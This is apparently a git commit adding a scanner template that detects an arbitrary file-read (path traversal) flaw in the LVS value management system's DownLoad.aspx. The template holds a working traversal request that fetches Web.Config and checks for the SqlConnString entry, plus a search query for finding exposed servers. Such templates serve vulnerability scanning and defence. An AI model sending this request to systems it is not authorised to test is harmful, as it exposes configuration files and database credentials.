Create lvs-download-lfi.yaml

2024-07-18 00:31:49 +05:30 · 2024-07-18 00:31:49 +05:30 · 7bbc540a1d
parent 51194f2d14
commit 7bbc540a1d
1 changed files with 33 additions and 0 deletions
--- a/http/vulnerabilities/other/lvs-download-lfi.yaml
+++ b/http/vulnerabilities/other/lvs-download-lfi.yaml
@ -0,0 +1,33 @@
+id: lvs-download-lfi
+
+info:
+  name: LVS DownLoad.aspx - LFI
+  author: pussycat0x
+  severity: high
+  description: |
+    LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability.
+  reference:
+    - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E
+  metadata:
+    verified: true
+    fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
+  tags: lvs,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<configuration>'
+          - '<appSettings>'
+          - '<add key="SqlConnString"'
+        condition: and
+
+      - type: status
+        status:
+          - 200